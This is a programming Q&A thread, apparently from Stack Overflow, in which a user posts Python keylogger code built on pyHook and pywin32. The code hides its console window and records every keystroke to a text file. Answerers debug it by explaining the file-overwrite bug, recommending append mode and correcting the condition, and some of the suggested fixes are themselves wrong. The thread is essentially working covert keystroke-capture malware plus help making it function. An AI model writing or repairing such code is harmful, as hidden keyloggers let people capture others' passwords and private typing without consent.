# python Writing to a output file

Tags: python, pywin32, keylogger

I am trying to write the key strokes I make to a new text file.
I got the following code:

```
import win32api
import win32console
import win32gui
import pythoncom
import pyHook

win = win32console.GetConsoleWindow()
win32gui.ShowWindow(win, 0)

def OnKeyboardEvent(event):
    if event.Ascii == 5:
        _exit(1)
    if event.Ascii != 0 or 8:
        f = open('C:\Users\Joey\Desktop\output.txt', 'w+')
        buffer = f.read()
        f.close()

        f = open('C:\Users\Joey\Desktop\output.txt', 'w')
        keylogs = chr(event.Ascii)

        if event.Ascii == 13:
            keylogs = '/n'
        buffer += keylogs
        f.write(buffer)
        f.close()

hm = pyHook.HookManager()
hm.KeyDown = OnKeyboardEvent
hm.HookKeyboard()
pythoncom.PumpMessages()
```

I don't get any errors so I guess that's good. But everytime I check `output.txt` I see a empty text file. What is wrong with my code?

Comment: Have you tried printing the content of your `buffer` in order to make sure not writing empty strings to your file? Instead of re-reading the file-contents you could think about appending to the file by passing the `a` option the open statement.

Answer (score 2, accepted):

Look [here](https://stackoverflow.com/a/1466036/3220769) for the difference between `w` and `w+`. You're overwriting the file every time with the second open for write `f=open('C:\Users\Joey\Desktop\output.txt', 'w')`

I'd imagine your file has just a line break in it. Try opening with just the `a` option to write to the end of file (EOF) every time.

```
if event.Ascii != 0 or event.Ascii !=8:
    f=open('C:\Users\Joey\Desktop\output.txt', 'a')
    keylogs=chr(event.Ascii)

    if event.Ascii == 13:
        keylogs='/n'
    buffer += keylogs
    f.write(buffer)
    f.close()
```

Comment: Thanks @TomNash for helping me :D

Answer (score 1):

Initially, your `if` statement always evaluates to true, it should be:

```
if event.Ascii != 0 or event.Ascii !=8:
```

or, even better:

```
if event.Ascii not in [0, 1]:
```

Also the file open modes might not be what you want, take a look at [the docs](https://docs.python.org/2/library/functions.html#open) for a rundown of these.